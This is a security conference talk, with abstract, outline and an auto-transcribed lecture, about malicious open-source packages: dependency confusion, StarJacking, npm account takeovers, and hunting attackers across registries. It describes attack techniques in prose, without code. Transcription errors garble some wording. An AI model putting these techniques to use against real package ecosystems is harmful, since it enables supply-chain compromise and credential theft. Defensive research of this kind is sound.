Abstract
Presentation Outline
1. Refresher on recent OSS attack, establishing:
- A quick baseline of terminology and concepts, plus a focus on recent major attack found (PHP, Dependency confusion, etc)
2. Lack of visibility
The Python Package Index (PyPI) deals with this issue by simply removing the malicious packages without publishing its code or metadata to a central point where the package could be found and researched.
Quite similarly, NPM removes all Code and Metadata and place a generic “security holding package” label on the package webpage, although it does publish a security advisory with varying levels of specificity.
Researchers are unable to learn from detected malicious packages. no IOC/contributor data = no hunting for more code packages.
- Lack of validation
One example is the process of publishing a python package to PyPi allows the publisher to link a GitHub repository to the package, then, PyPi pulls the repository statistics straight from GitHub and presents it on the package web page. The problem is, there is no validation of the connection between the package and the repository.
We will demonstrate this technique we came to call StarJacking .
- Lack of awareness
The entire ecosystem is focused on detecting known Vulnerabilities, many security teams believe this risk Is cover under SCA products.
This is not the case, Vulnerabilities ≠ Malware.
We need a mindset shift and new technology stack to detect attackers in code packages.
Reactive Vs Proactive, Static signature Vs Dynamic execution
- Looking ahead
Most of what we do today in the field of malicious open-source software can best be described as patch management. The “cyber” point of view has yet to enter this game.
In this spirit, some thoughts of where we should be heading:
• Malware zoo -> code package hatchery
• Sandbox for files -> detonation chambers for dynamic analysis of code
• Cross language detection
• TTP’s
• Bonus – contributors’ reputation
Transcript
This transcript was autogenerated. To make changes, submit a PR.
Hi guys and welcome to my lecture
why attackers in code packages are getting a pass.
First, let me introduce myself. My name is Sahi.
I am the head of software supply can at checkmarks.
I have many years of experience in cyber. I used to
work in McAfee Symantec, Palo Alto and most recently
in Checkmarx. My specialty is building
advanced malware resource system. So today I want
to talk about Opensource. Everybody is using
open source. It helped developing product faster
and anybody can contributors code to an open source project,
which is a big part why this ecosystem is so
successful. Coming from a cyber background, I ask
myself, do attackers contribute code as
well? Well, the short answer is yes.
Let us see. We have studied this attack surface
for a really long time, all the recent attacks, and we would be happy to
share with you what we have learned about open source, which of course
are part of supply chain. And supply chain attacks are on
the rise. Let's take a could of example so
we will be clear what we are talking about. The first example I
want to give is dependency confusion.
Dependency confusion is an attack technique that was
discovered last year. It was used to hack into a Microsoft
Apple Netflix companies by a hectical hacker.
It's a new type of can open source supply chain and in
many cases this is not a bug, this is a feature. What usually
happens with a dependency confusion is when
a developer is actually using packages. It will use a
combination of internal packages. In this example,
my company utils and can external packages like
react, the artifact server will etc.
The relevant package. But as we can
see, there is no by default a clear indication of private
or public. So what can happen in
this confusion, which is common, is an attacker
can guess, just guess the name of an internal package
and register that on NPM or Python or
other languages. And because
anybody can register a package if he was able
in guessing the internal name and if this is the default configuration,
what will happen, as you can see is he will
be able to get his package inside the developer
workstation. So if both
names are the same, why would the artifact server
choose to take the attacker one? As you can see, a lot
of the time a developer will mention take the latest version
and an attacker can just give himself a very high
version number for this attack to succeed. This is
not can hypothetical attack. We are seeing those kind of attacks
weekly. Just a couple of weeks ago we
were able to track down and remove packages that were
uploaded by an attacker called never summer 68.
When you look at the package, you can first see
by the version number which is not a typical version number.
This is usually some kind of indication. This can be a
dependency confusion. And if you look at the names,
you can actually figure out which organization he was trying
to target. If a developer was using
a part of this information, what was stored inside the
package has code that will automatically steal the ssh
keys of the developer and will send them to an
attacker control website. So this stack is still ongoing
and we really believe in giving back to the community. So we have
released an open source tool called Dusty Lock that helps monitor
this kind of configuration and alert you not to use those
internal packages name. Check it out. Another attack
that we saw a couple of months ago with a
very high impact where two really popular
NPM packages were compromised. Can attacker
actually uploaded the malicious packages which affect tens of
thousands of organizations worldwide? The first
package was UA parser and as you can see
pointed in red. Those are the malicious part.
So he added the first part which actually download
the password stealer and then the second part which actually download a
crypto miner. It was discovered,
they were removed and an official advisory was sent
out by CISA. Two weeks later, the same attacker
did the same thing. This time compromising packages called COA
and RC. And as you can see they are quite popular.
This instance he made a bug making has
attack unsuccessful, while still crippling a lot of build
servers all around the world. We monitor those things constantly
and as we can see those attacks are
not isolated. We were actually able to find a period
attack regarding UA parser and we track
this attacker as UNC 3379
inside the industry. We don't think this will be his
latest attack. And of course those are not just attacks around
NPM, those can happen to in every open source language
out there. So as we say, we were
able to detect these attackers and alert against them
and write about the bugs he created. But this
wasn't enough. Why is that? If we
study the activity of the attacker, what we call
a TTP, we can see that he is constantly
compromising NPM accounts and doing what we
are calling NPM account takeover. If we
look at that, usually an open source contributor will have one
GitHub account where he stores has code and another account
into NPM in this example. But it could be Python or
any other language or maven that store this package.
What the attacker is doing is compromising the NPM
account. Why is that important? To learn about the
habits about the tool significant procedure of an attacker.
So usually what happens is when you store your
code in GitHub, you can then push it into NPM.
When you have the right tag, this is a normal activity
and we have seen it many times. This is for example UA parser,
and you can see a correlation between the tag and between the
package. Until the attack,
the attacker uploaded three new versions into NPM,
but he wasn't able to compromise the GitHub account. So we never saw
their code inside GitHub. This of course can be a
reason to suspect and the
reason they uploaded three different versions. So we make sure that
whatever update policy you are using, you will actually use one
of those versions. So the problem for us
is, even if we were able as a community to detect
and to alert, when you are talking about packages, there are
millions of weekly downloads, the amount of time it
takes us to monitor, alert and download them,
there are still a lot of organization being affected. We wanted
to find an innovative way to stay out of the curve for
that we have released for the community what we call chain
alert can alert is an early warning system
offered free to everyone in the open source community.
Basically what we are doing is we're monitoring new releases,
and whenever we found a new release that has no corresponding
code or activity in GitHub, we alert the
maintainer. Hey, we just saw a new package being released,
but we never saw the code in GitHub. Is that okay or not?
We are not saying those are malicious, but we are alerting
and monitoring for suspicious activity.
So if we found those kind of examples
and the attacker will track again, we have a way
to quickly identify and maybe avoid those suspicious packages.
This is right now what we are doing. We are opening like
an issue to the original packages maintainer and also
for everybody that described to the project and is using
one of those package will get an issue automatically. So we
created this to raise developer awareness and
analyze account takeovers. And again, as I said, it's a free service for
the open source project and the open source community.
Feel free to join us or add some feature requests.
We'll be happy to get your feedback guys. So this is
of course can a lot on GitHub. So why
are these attacks so hard to detect? Most of what
we are doing today is more of a reactive approach,
meaning we wait until somebody else
to flag those attacks and then we react to them.
So we are not doing a proactive approach, we are not hunting,
we are not automatically analyzing everything that's being upload.
The problem with being reactive, waiting for somebody else to report
it could lead to a long meantime for detection.
Meaning we can be under attacks for a really long time until somebody
else will notice and then I'll be able to repair that.
Another thing is most of the interest still relies
on static signatures. This could be
a bit problematic when you're trying to stop an attacker because
Avalon in the cyber industry, static signatures are quite
easily to bypass by an attacker. So let me give
you an example of what I mean. Reactive as proactive.
I'm going to talk about hunting. We've been doing hunting for many years
in cyber. Now how can we hunt in open source?
So our story begins with a really
cool project I really like called Backstabbers knife collection,
which is a couple of people just maintaining a list of malicious
packages that were removed into a central repository where researchers
can actually take a look at them. So we
are always looking for malicious packages. And for this
example we'll start with a malicious packages actually uploaded
into backstabbers. So this packet was
actually flagged maliciously a couple of years ago.
And we can see the basic code code and what it
was doing. But do we think this is a
one time incident or there is an attacker behind
it? And if so, what can we learn about this attacker?
So every time we came across a malicious package, we don't
just remove it or flag it.
We are being proactive. We are hunting for it. What do I
mean? So I'll show you a couple of our methodologies.
So when we are go hunting, we are looking at the metadata.
What do we know about this account, this description, those repository,
this home page, this owner. What do we know about the
IOCs indicator of compromise inside this package,
the URL, the domain, the IP cryptocurrency.
And then we automatically using our system create
a unique import compose and then we start looking for suspicious
packages in other languages also and
looking at those package. Although we started in
Python, based on the unique characteristic
that I've shown you, we were actually able to find live packages
couple of years later after the first package was
removed. So those packages were
actually still active and we reported them onto Python to
NPM, to Ruby and we will have them removed. This is not
something unique. We need to understand this is not a vulnerability,
this is not a bug that we just remove. Those are attackers.
And we need to change our mindset about how do we approach
attackers and how do we track them, how do we hunt them down.
We have done this mind shift in cyber with IR.
We need to embrace this same mind shift in open source enable
to keep our ecosystem clean. So for me
this talk is actually a call for action as a
researcher who want to keep the open source community clean.
We need to have some kind of a central repository of malicious packages.
I really like the backstabbers,
but I think that we need a more commitment from
the major players in the field for a central repository
of malicious packages and their full metadata so
researchers like me and other can hunt for OSS
hackers and keep our ecosystem clean. Thank you
guys. I hope hope you find it interesting and I hope
we shed some light about recent open source attacks and attackers and
the mindset we believe we need in order to
not give them a pass, track them, find them,
and keep the ecosystem clean. Thank you guys and
have a great day.